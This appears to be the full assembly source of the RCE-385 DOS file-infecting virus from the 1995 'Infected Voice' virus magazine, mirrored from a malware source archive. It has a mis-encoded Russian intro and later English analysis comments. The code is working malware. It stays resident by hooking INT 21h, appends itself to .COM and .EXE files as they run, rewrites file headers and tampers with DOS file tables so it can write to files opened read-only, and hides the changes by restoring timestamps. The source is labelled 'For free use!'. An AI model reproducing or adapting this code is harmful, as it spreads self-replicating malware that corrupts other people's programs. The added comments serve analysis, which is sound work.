mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B> STEALTH group ۰ <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20> <20> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><> <20><>
|
|||
|
;<3B> presents ۰ <20> <20> <20> <20><> <20><> <20> <20> <20><> <20> <20> <20> <20> <20> <20> <20> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۰ <20> <20> <20> <20> <20><><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JAN 1995
|
|||
|
;
|
|||
|
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
|
|||
|
; THE FIRST UNIQUE VIRUS MAGAZINE IN FORMER U.S.S.R.!!!
|
|||
|
;
|
|||
|
;--- RCE-385 (!).-------------------------------------------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>६<EFBFBD><E0A5AC><EFBFBD> <20><>諨 - <20><><EFBFBD><EFBFBD><EFA2A8><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>誠 <20><><EFBFBD>⮢<EFBFBD><E2AEA2> <20> <20><><EFBFBD><EFBFBD>ᠫ <>
|
|||
|
;<3B><><EFBFBD>⮢᪨ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> AdInf -> <20><> <20> <20><><EFBFBD> <20><> ⥯<><E2A5AF><EFBFBD>?<3F>-<2D><>,⥯<><E2A5AF><EFBFBD> ᨤ<><E1A8A4> <20><> <20><>孮<EFBFBD><E5ADAE><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B> <20>⥭<EFBFBD><E2A5AD><EFBFBD> <20><> ⥬ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>६<EFBFBD><E0A5AC><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20> <><EEA7A5> 楫<><E6A5AB> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>設<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>,
|
|||
|
;<3B> <20><> - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><>맦<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD> ⠪<><E2A0AA> <20><><EFBFBD>३ <20> RAM<41>.
|
|||
|
; <20> ⥯<><E2A5AF><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>⠢<EFBFBD><E2A0A2><EFBFBD> <20>ਬ<EFBFBD>祪 <20><>直<EFBFBD> - <20><><EFBFBD><EFBFBD> <20><><EFBFBD>,<2C>ࠧ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21><><EFBFBD><EFBFBD> <20>⥫<EFBFBD><E2A5AB>
|
|||
|
;<3B>ਧ<EFBFBD><E0A8A7>㬠<EFBFBD><E3ACA0><EFBFBD><EFBFBD> : "<22> 祣<> <20><><EFBFBD> <20><> ᤥ<><E1A4A5> ⥫<> <> ᮪<>뢠<EFBFBD><EBA2A0>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> *beep <20>
|
|||
|
;*beep".<2E> <20> <20><><EFBFBD> <20><><EFBFBD> <20><>襫 ࠧ<><E0A0A7><EFBFBD> <20> <20>।<EFBFBD> <20><>ଠ<EFBFBD><E0ACA0><EFBFBD>.<2E><><EFBFBD> <20>।<EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>뫮 <20> <20><><EFBFBD><EFBFBD>饭-
|
|||
|
;<3B><><EFBFBD> ०<><E0A5A6> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ⥬ ᠬ<><E1A0AC> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>襢<EFBFBD><E8A5A2><EFBFBD>
|
|||
|
;<3B><><EFBFBD>頥<EFBFBD> <20><><EFBFBD> ॠ<>樨 <20><>⥪<EFBFBD><E2A5AA><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>饣<EFBFBD>,<2C><>設<EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
;<3B><> *beep <20><><EFBFBD>᪠<EFBFBD><E1AAA0>!<21><> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> *beep<65><70>!<21><><EFBFBD><EFBFBD><EFBFBD>蠩<EFBFBD><E8A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ଠ<EFBFBD><E0ACA0> --
|
|||
|
;<3B><> <20> <20><>ࠦ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⬠!!!<21><>堩 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>直<EFBFBD><EFAAA8>
|
|||
|
;ॢ<><E0A5A2><EFBFBD>ࠬ<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20><>ଠ<EFBFBD><E0ACA0><EFBFBD> <> <> <20><><EFBFBD><EFBFBD><EFBFBD>.<2E><> 祬 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> ⥬ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> !
|
|||
|
;(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>뫨 Basic).<2E> <20><>稫<EFBFBD><E7A8AB> <20><>直<EFBFBD> - <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> "<22><>ᠤ<EFBFBD><E1A0A4>"!
|
|||
|
; <20><> ᨥ <20><><EFBFBD> 梥<><E6A2A5>窠<EFBFBD><E7AAA0> <20><><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD><EFBFBD>!<21> <20><><EFBFBD> <20>।<EFBFBD>⠢<EFBFBD><E2A0A2> ᥡ<>,<2C><><EFBFBD> <20><><EFBFBD>諥<EFBFBD><E8ABA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࢮ<EFBFBD> <> <20>ந<EFBFBD><E0AEA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> ⥮ਨ <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD>襩-<2D><>ଠ<EFBFBD><E0ACA0><EFBFBD>!<21><><EFBFBD> <20> <20><><EFBFBD>諮<EFBFBD><E8ABAE> <20><><EFBFBD> <20><><EFBFBD>⠢<EFBFBD><E2A0A2><EFBFBD><EFBFBD> <20><>ᮡ<EFBFBD><E1AEA1>-<2D><><EFBFBD>-<2D><>稭<EFBFBD><E7A8AD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
;<3B><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> RCE-666 (<28><><EFBFBD><EFBFBD> <20><>ᠭ).Aidstest <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: INFO /666,Web: Die-666.
|
|||
|
;<3B><> <20><>⮬ <20><>१<EFBFBD><E0A5A7> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>쪮,<2C><><EFBFBD><EFBFBD>稫 <20> RCE-385!
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>窮<EFBFBD>- <20>祡<EFBFBD><E7A5A1><EFBFBD><EFBFBD><EFBFBD> <20>⠭<EFBFBD><E2A0AD>,<2C> <20><><EFBFBD> <20><>ᯮ<EFBFBD> <20><><EFBFBD><EFBFBD> - <20><><EFBFBD>⮩-
|
|||
|
;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;(c) Light General.Kiev.1995. STEALTH group . For free use!
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
; Syntax/target: MASM/TASM-style 16-bit real-mode source (segment/assume,
; proc/endp, "offset", "ptr"); laid out as a DOS .COM image (org 100h).
; This first part is the carrier program of an already-infected sample:
; a 4-byte prologue (NOP + near JMP) followed by the original host code.
cseg segment
assume cs:cseg,ds:cseg
org 100h
start:
        nop                     ; first byte 90h; the infection routine later in this file
                                ; ("cmp al,90h") skips .COM files that start with this byte,
                                ; so it doubles as the already-infected marker
        jmp virr                ; control goes to the appended body before the host runs
; Host program body: prints a '$'-terminated string and terminates.
        nop
        nop
        mov ah,09               ; INT 21h AH=09h: write string at DS:DX
        lea dx,wrn
        int 21h
        mov ax,4c00h            ; INT 21h AH=4Ch: terminate, return code 0
        int 21h
;--------------------------------------
wrn db 'FRODO LIVES!$'
|
|||
|
;--------------------------------------
|
|||
|
|
|||
|
;################# VIRUS ##################
|
|||
|
|
|||
|
virr:
; Entry of the appended body. Everything from here on is addressed as
; "offset X - offset virr" plus a run-time base, because the body sits at a
; different offset in every file it is attached to.
        call $+3                ; pushes the address of the next instruction (virr+3)
        pop si
        sub si,03               ; SI = run-time address of virr (delta offset)
;-Hacked mem.-----------------------------------------------------
        push si                 ; kept on the stack until exit_v pops it
        clc
        mov ax,0FEFEh           ; residency probe: int_21h_entry in this file answers
        int 21h                 ; AX=0FEFEh by returning with CF=1
        jc exit_v               ; CF=1 -> a copy is already resident, skip installation
;- Reserving memory at the top of the program's block ---------------------
; The (mis-encoded) original commentary describes the two DOS structures
; that are edited below. In summary:
;
;---(1)--- MCB - Memory Control Block, one paragraph in front of the block
;   offset  size  meaning
;     00     1b   'M' for an ordinary block, 'Z' for the last one
;     01     1w   owner of the block
;     03     1w   block size in paragraphs (1 paragraph = 16 bytes)   <- edited
;
;---(2)--- PSP - Program Segment Prefix
;   offset  size  meaning
;     00     1w   INT 20h instruction (CD 20h)
;     02     1w   segment just past the memory given to the program   <- edited
;
; Both fields are lowered by the same amount, so the paragraphs cut off at
; the top of the block are no longer accounted to the program. For an
; analyst the visible effects are a block size that is 35 paragraphs smaller
; than what DOS handed out and code living above PSP:0002.
        mov ax,ds
        dec ax
        mov es,ax               ; ES = DS-1; assumes DS still holds the PSP segment,
                                ; which makes ES the program's MCB - TODO confirm for EXE hosts
        sub word ptr es:[03],35 ;* 512b  (original note; 35 paragraphs are 560 bytes)
        sub word ptr ds:[02],35 ;* 512b  (same amount taken off PSP:0002)
        mov es,ds:[02]          ; ES = the lowered top-of-memory segment
        push ds cs              ; multi-operand push: DS, then CS
        pop ds                  ; DS = CS; the original DS stays on the stack
        xor di,di
        mov cx,offset ax_len-offset virr ; byte count; ax_len is defined outside this excerpt
        rep movsb               ; copy CX bytes from DS:SI (running body) to ES:0000
;-Install int.----------------------------------------------------
        mov al,21h              ; interrupt number for inst_int
        mov dx,offset int_21h_entry-offset virr ; handler offset inside the copied body
        mov si,offset ofs_21h-offset virr       ; slot that exit_all uses as far-jump target
        push es
        pop ds                  ; DS = segment of the copied body
        call inst_int           ; not visible here; presumably stores the old vector at
                                ; DS:SI and points the vector at DS:DX - verify in inst_int
        pop ds                  ; restore the DS saved by "push ds cs"
|
|||
|
exit_v:
; Hand-back path: decide from the saved header bytes whether the host is a
; .COM or an .EXE and return control to it.
        push ds
        pop es                  ; ES = DS
        pop si                  ; SI = run-time address of virr (pushed right after the
                                ; delta-offset computation)
;- COM or EXE ?---------------------------------------------------
; origin_2_byte (defined outside this excerpt) is the buffer the infection
; routine fills with the first 18h bytes of the target file. A 'Z' in its
; second byte is taken as the "MZ" signature of an .EXE host.
        cmp byte ptr cs:[si+offset origin_2_byte-offset virr+1],'Z'
        jz L_exe
;- .COM host: restore its first bytes in memory --------------------
; The first four bytes of the loaded image were replaced on disk by the
; jump to the appended body; the saved originals are copied back to 100h.
        mov di,100h
        add si,offset origin_2_byte-offset virr
; SI = address of the saved original bytes of the .COM file
        push di                 ; 100h becomes the return address for the RET below
        movsw                   ; 2 x movsw = 4 bytes from DS:SI to ES:0100h
        movsw
        xor ax,ax               ; AX = 0 when the host gets control
        ret ; Go to infected com program.
|
|||
|
;-Loaded from exe file.--------------------------------------------
; .EXE host: the entry point taken from the file header at infection time
; (IP_file / CS_file) is relative to the load segment, so the segment part
; is relocated here and control is passed with a far jump whose operand
; bytes are the two data words below (code that patches itself at run time).
; (The mis-encoded original comment cites a printed reference, p. 362, for
; the .EXE header layout.)
L_exe:
        mov ax,es               ; ES was set equal to DS at exit_v; presumably the PSP segment
        add ax,10h              ; + 10h paragraphs = segment right after the 256-byte PSP
        add cs:[offset CS_file-offset virr][si],ax
; CS_file now holds the absolute segment of the host's entry point
        db 0eah ;-
IP_file dw ? ;- JMP Far CS_file:IP_file
CS_file dw ? ;-
|
|||
|
;------------------------------------------------------------------
|
|||
|
; <20> <20><><EFBFBD> ᮡ<>⢥<EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20>⢥<EFBFBD><E2A2A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3>!
|
|||
|
; Resident INT 21h filter. Three cases:
;   AX=0FEFEh  -> residency probe from a starting copy: answer with CF=1
;   AX=4B00h   -> DOS "load and execute": run the infection routine first
;   otherwise  -> pass the call to the previous handler (exit_all)
; The labels exit_date / exit_close / exit_pop are the shared clean-up tail
; that "infecting" and "write_virus" jump back into.
int_21h_entry proc
        cmp ax,0FEFEh
        jnz _@1
        stc                     ; CF=1 is the "already resident" answer
int_24h_entry:
; Also used as the temporary INT 24h (critical error) handler:
; AL=03 is the "fail the call" reply, so no DOS error prompt such as
; "Write protect error" appears while a file is being modified.
        mov al,03
        retf 2                  ; far return that drops the saved FLAGS word, so the
                                ; current flags (including CF) reach the caller

_@1:
        cmp ax,4b00h            ; DOS is about to execute a program
        jnz exit_all
        jmp infecting
exit_date:
; Re-apply the time and date held in the file's SFT entry (ES:DI, set up in
; "infecting"), so the modified file keeps its previous timestamp.
        mov ax,5701h            ; INT 21h AX=5701h: set file date/time, BX = handle
        mov cx,es:[di+13] ;<- Time
        mov dx,es:[di+15] ;<- Date
        int 21h
exit_close:
        mov ah,3eh              ; INT 21h AH=3Eh: close handle BX
        int 21h
exit_pop:
        lds dx,cs:[offset ofs_24h-offset virr] ; saved INT 24h vector (ofs_24h is outside this excerpt)
        mov ax,2524h            ; INT 21h AH=25h: set vector 24h back to DS:DX
        int 21h
        pop bp                  ; reverse order of the nine pushes at "infecting"
        pop ds
        pop es
        pop di
        pop si
        pop dx
        pop cx
        pop bx
        pop ax
exit_all:
; Inline "JMP FAR seg_21h:ofs_21h": continue in the handler that owned
; INT 21h before installation. The two words are zero in the source and
; are presumably filled in by inst_int - verify there.
        db 0eah
ofs_21h dw 0000
seg_21h dw 0000
int_21h_entry endp
|
|||
|
;-------------------------------------------------------------------
|
|||
|
infecting:
; Reached from int_21h_entry on AX=4B00h with DS:DX = path of the program
; DOS was asked to execute. All registers are saved and restored at
; exit_pop, after which the original 4B00h call continues via exit_all.
        push ax
        push bx
        push cx
        push dx
        push si
        push di
        push es
        push ds
        push bp
        push ds                 ; second copy of DS:DX, needed again after inst_int
        push dx
;------------------------------------------------------------------
; Replace the INT 24h critical-error handler for the duration of the file
; operations; with the stub at int_24h_entry a write to a protected disk
; fails quietly instead of showing the DOS prompt:
; Write protect error ...
        mov al,24h
        mov si,offset ofs_24h-offset virr      ; slot for the previous vector (restored at exit_pop)
        mov dx,offset int_24h_entry-offset virr
        call inst_int           ; defined outside this excerpt
        pop dx
        pop ds                  ; DS:DX = program path again
;-Open file...-----------------------------------------------------
        mov ax,3d00h            ; INT 21h AH=3Dh, AL=00: open for reading only
        int 21h
        jc exit_pop
;-Read header (EXE) or first 4 byte (COM).-------------------------
        mov bh,3fh
        xchg ax,bx              ; BX = file handle, AH = 3Fh (read)
        mov cx,18h
        push cs
        pop ds                  ; DS = segment of the resident copy
        mov dx,offset origin_2_byte-offset virr
        mov si,dx               ; SI -> buffer, used by LODSB and the header reads below
        int 21h                 ; read the first 24 (18h) bytes of the file
_1:
        jc exit_close           ; read error -> close the file and leave
;-Look SFT file!-----------------------------
; SFT = System File Table, the DOS-internal record kept for every open
; file. Instead of calling the documented functions for attributes, open
; mode and seeking, the code edits the file's SFT entry directly. The
; mis-encoded original comment mentions Help PC and "RC-0-512 (666,
; Written by Dark Avenger.)" in connection with this technique.
;
; Fields used here (decimal offsets into the entry):
;   offset  size  meaning
;     00     1w   number of handles referring to the entry
;     02     1b   access mode the file was opened with        <- patched
;     04     1b   file attribute
;     11     1w   first cluster of the file
;     13     1w   time of last modification                   (read at exit_date)
;     15     1w   date of last modification                   (read at exit_date)
;     17     2w   file size                                   (low word read)
;     21     2w   current file position                       <- patched
;     32     11b  name and extension, without the '.'
;
; For monitoring this matters because the file is opened read-only through
; INT 21h and then written through the same handle: a check that only looks
; at the access mode passed to AH=3Dh, or at attribute changes, sees nothing.
        mov ax,1220h            ; INT 2Fh AX=1220h: ES:DI -> job-file-table byte for handle BX
        push bx                 ; keep the handle
        int 2fh
        mov bl,es:[di]          ; BL = SFT entry number of that handle
        mov ax,1216h            ; INT 2Fh AX=1216h: ES:DI -> SFT entry number BX
        int 2fh
        pop bx                  ; BX = handle again
        mov byte ptr es:[di+2],02 ; access mode := 2 (read/write), although the open
                                ; call asked for read-only
        mov bp,es:[di+17] ; BP = file len!
;---------------------------------------------
; Classify the file by the first byte that was read.
        lodsb
        dec si                  ; SI back at the start of the buffer
        cmp al,'M' ; first byte of "MZ" -> treat as .EXE
        jz _EXE
        cmp al,90h ; NOP as first byte -> .COM file that already carries the 4-byte prologue
_1d:
        jz exit_close
;-Infect .COM --------------------------------
        xchg ax,bp              ; AX = file length (low word)
        cmp ax,65000
        ja exit_close           ; longer files are left alone
        mov es:[di+21],ax       ; SFT file position (low word) := file length,
                                ; so the next write appends
;-Make JMP------------------------------------
; The new prologue written to the start of the file contains a near jump
; to the appended body; its displacement is derived from the file length.
        sub ax,04
        mov ds:[offset jmp_n-offset virr],ax   ; jmp_n is defined outside this excerpt
        call write_virus        ; append the body; on success the file position is 0 again
        mov cx,04h              ; then overwrite the first 4 bytes of the file
        mov dx,offset new_3_byte-offset virr   ; new_3_byte is defined outside this excerpt
exit_write:
        mov ah,40h              ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
        int 21h
_1b: jmp exit_date
|
|||
|
;-Sub. for write virus body (only) in file.----
|
|||
|
; write_virus: writes the resident copy of the body (DS:0000, length
; ax_len - virr) to handle BX at the current file position, then resets the
; file position in the SFT entry at ES:DI to 0.
; In:    BX = handle, DS = segment of the resident copy, ES:DI -> SFT entry
; Out:   returns only if the full length was written; on a short write the
;        return address is discarded and control goes to _1b (exit_date)
; Clobb: AX, CX, DX, flags
write_virus proc
        xor dx,dx               ; DX = 0: buffer offset now, zero source for the stores below
        mov ah,40h              ; INT 21h AH=40h: write
        mov cx,offset ax_len-offset virr
        int 21h
        mov es:[di+21],dx ; F.P = start file!
        mov es:[di+23],dx       ; high word of the file position as well
        cmp ax,cx               ; AX = bytes actually written
        jnz _1c
        ret
_1c:
        pop ax                  ; drop this routine's return address
        jmp _1b ; exit_date!
write_virus endp
;-Infect .EXE ---------------------------------
_EXE:
; Analysis notes -- .EXE branch, entered from the `cmp al,'M'` / `jz _EXE`
; test earlier in this routine.  Register roles are established before
; this point and are not visible here; judging from the usage below:
; DS:SI -> buffered MZ header, BP = low word of the real file length,
; ES:DI -> the file's SFT entry (TODO confirm upstream).
; The original comments in this branch are partly encoding-damaged; the
; English ones are kept as found.
;
; Step 1: rebuild the file length from the header as
; (pages - 1) * 512 + bytes-in-last-page and compare its low word with BP.
; A mismatch is treated as "file carries an overlay" and the file is left
; unmodified.
          mov     ax,ds:[si+4]                     ; Pages (512b).
          dec     ax
          mov     cx,512
          mul     cx                               ; DX:AX = (pages-1)*512
          add     ax,[si+2]                        ; AX = File len from header.
          cmp     ax,bp                            ; Real file len = ax ?
          jnz     _1b                              ; No - this is overlay.
;-----
; Step 2: set the file-pointer dword at ES:[DI+21] to that length, so the
; next write goes to the end of the file.
          mov     es:[di+21],ax                    ; file pointer low word = length
          mov     es:[di+23],dx                    ; file pointer high word
;-Get header.-----------------------------------
; Step 3: copy the header's entry point (IP at +14h, CS at +16h) into the
; IP_file / CS_file slots.  Those slots are defined outside this excerpt;
; for recovery of an affected file they are where the original entry
; point would be found.
          mov     ax,[si+14h]
          mov     ds:[offset IP_file-offset virr],ax
          mov     ax,[si+16h]
          mov     ds:[offset CS_file-offset virr],ax
;-----------------------------------------------
; Step 4: compute a new entry point that refers to the end of the original
; file: DX:AX (file length) / 16 gives paragraphs in AX and the remainder
; in DX; the header size in paragraphs ([si+8]) is subtracted from AX.
          xchg    ax,bp                            ; AX = file length low word (BP now holds old CS)
          mov     cx,10h
          div     cx                               ; AX = length / 16, DX = length mod 16
          sub     ax,[si+8]                        ; minus header paragraphs
          sbb     dx,0                             ; DX = remainder minus borrow from the sub
          mov     [si+16h],ax                      ; ReloCS.
          mov     [si+14h],dx                      ; ExeIP.
;-Correcting file len in header.----------------
; Step 5: the header page count is raised by exactly one 512-byte page.
; The original comment here is encoding-damaged; its legible parts
; mention 385 and 512.  For analysts: write_virus appends
; (offset ax_len - offset virr) bytes, so if that is fewer than 512 the
; header-derived length no longer equals the real length afterwards, and
; the overlay test in step 1 would reject the file on a later pass.  The
; same mismatch is a candidate indicator when triaging suspect EXE files
; (inferred from the visible code; verify during analysis).
          inc     word ptr ds:[si+4]
;-Write virus to file.--------------------------
          call    write_virus                      ; also resets the file pointer to 0
;-Write new header.-----------------------------
; Step 6: the first 18h bytes of the modified header are written back at
; file position 0 through the shared exit_write tail (AH=40h, INT 21h).
          mov     cx,18h
          mov     dx,si                            ; DX = offset header.
          jmp     exit_write                       ; shared write + exit path (original
                                                   ; comment unreadable apart from
                                                   ; the words "int 21h")
;----------------------------------------------
;-----------------------------------------------------------------------
; inst_int -- analysis notes
; Saves an interrupt vector and then replaces it.  Calls DOS INT 21h/AH=35h
; (get vector), stores the returned ES:BX at DS:[SI] (offset) and
; DS:[SI+2] (segment), then calls INT 21h/AH=25h (set vector).
; In:    AL = interrupt number, DS:DX = new handler address, DS:SI =
;        4-byte save slot -- none of these is loaded here; presumably set
;        by the caller (TODO confirm).
; Out:   ES:BX = previous vector as returned by AH=35h.
; Clobb: AH, BX, ES.
; Note:  AL is not reloaded between the two calls, so the routine relies
;        on AH=35h leaving AL unchanged.
; Defender note: a vector change made through AH=25h is visible to a
;        monitor that watches that call, or to a comparison of the
;        interrupt vector table against a known-good baseline.
;-----------------------------------------------------------------------
inst_int  proc
          mov     ah,35h                           ; DOS: get interrupt vector -> ES:BX
          int     21h
          mov     ds:[si],bx                       ; save old handler offset
          mov     ds:[si+2],es                     ; save old handler segment
          mov     ah,25h                           ; DOS: set interrupt vector from DS:DX
          int     21h
          ret
inst_int  endp
; Analysis notes -- data area.
; new_3_byte / jmp_n: the 4-byte stub written at the start of a .COM file
; (see `mov cx,04h` / `mov dx,offset new_3_byte-offset virr` before
; exit_write).  The leading 90h is also the value the earlier
; `cmp al,90h` / `jz exit_close` test looks for, so a file that already
; begins with that byte is skipped.  jmp_n is filled in at run time with
; the value stored as the file position minus 4 (`sub ax,04`), i.e. the
; displacement of the near jump.
new_3_byte      db      90h                      ; NOP
                db      0e9h                     ; JMP nn
jmp_n           dw      0000                     ; nn
;-Header for EXE file & buffer for first 5 bytes COM's file.--
; The four bytes at `header` lie before ax_len and are therefore part of
; the image that write_virus writes (its length is
; offset ax_len - offset virr); everything from ax_len on is scratch space
; that is not written out.
origin_2_byte:
header:
                db      4 dup (90h)              ; NOPs
ax_len          db      ?                        ; label doubles as end-of-image marker
                db      20h dup (?)              ; For EXE header.
; Not referenced in the visible part of the file; by their names,
; presumably the save slot for an INT 24h vector (offset, segment) -- TODO confirm.
ofs_24h         dw      ?
seg_24h         dw      ?
;********************************************************
cseg ends
end start
;-- Written by Light General.Kiev.1995.For free use! ----